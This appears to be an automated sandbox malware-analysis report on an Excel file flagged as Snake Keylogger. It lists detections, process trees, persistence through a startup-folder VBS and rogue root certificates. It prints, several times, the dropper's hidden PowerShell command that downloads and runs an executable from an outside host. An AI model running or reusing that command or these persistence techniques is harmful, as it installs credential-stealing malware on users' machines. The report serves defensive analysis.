              Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: tmp667.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: svcost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp667.exe.3695570.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@8/14@1/1
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DGTCkacbSz.xlsxJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR85B2.tmpJump to behavior
              Source: DGTCkacbSz.xlsxOLE indicator, Workbook stream: true
              Source: 79E20000.0.drOLE indicator, Workbook stream: true
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................R...............R.................O...........Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................R...............R.................O...........Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................R...............R.................O...........Jump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: DGTCkacbSz.xlsxReversingLabs: Detection: 39%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\svcost.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: DGTCkacbSz.xlsxInitial sample: OLE zip file path = xl/media/image1.png
              Source: 79E20000.0.drInitial sample: OLE zip file path = xl/media/image1.png
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp667.PDBO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 5.2.tmp667.exe.370d5b0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp667.exe.47a0000.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 5.2.tmp667.exe.37cb830.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Suspicious powershell command line found
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;Jump to behavior
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 5.2.tmp667.exe.48b0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.451714574.00000000048B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.446711663.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_004242E0 push AC005BFAh; retf 5_2_004244BD
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00424340 push AC005BFAh; retf 5_2_004244BD
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00601247 pushfd ; retf 5_2_00601255
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_006D4B48 pushfd ; retf 5_2_006D4B49
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D58AB9 push 8C00440Dh; retf 5_2_00D58AC5
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D535F0 push ecx; retf 5_2_00D535F6
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_00D5363B push es; retf 5_2_00D53641
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeCode function: 5_2_054035A6 push edi; retf 5_2_054035AC
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_008E42E0 push 64006FCFh; retf 8_2_008E43FD
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C2FA89 pushfd ; retf 8_2_00C2FA95
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C2554C push ss; ret 8_2_00C2554D
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_00C44B48 pushfd ; retf 8_2_00C44B49
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_043235F0 push ecx; retf 8_2_043235F6
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_0432363B push es; retf 8_2_04323641
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_04328AB9 push 8C009E0Dh; retf 8_2_04328AC5
              Source: C:\Users\user\AppData\Roaming\svcost.exeCode function: 8_2_054035A6 push edi; retf 8_2_054035AC
              Source: tmp667.exe.2.drStatic PE information: section name: .text entropy: 7.764858525500812
              Source: svcost.exe.5.drStatic PE information: section name: .text entropy: 7.764858525500812

              Persistence and Installation Behavior

              barindex
              Installs new ROOT certificates
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeFile created: C:\Users\user\AppData\Roaming\svcost.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmp667.exeJump to dropped file

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbsJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmp667.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
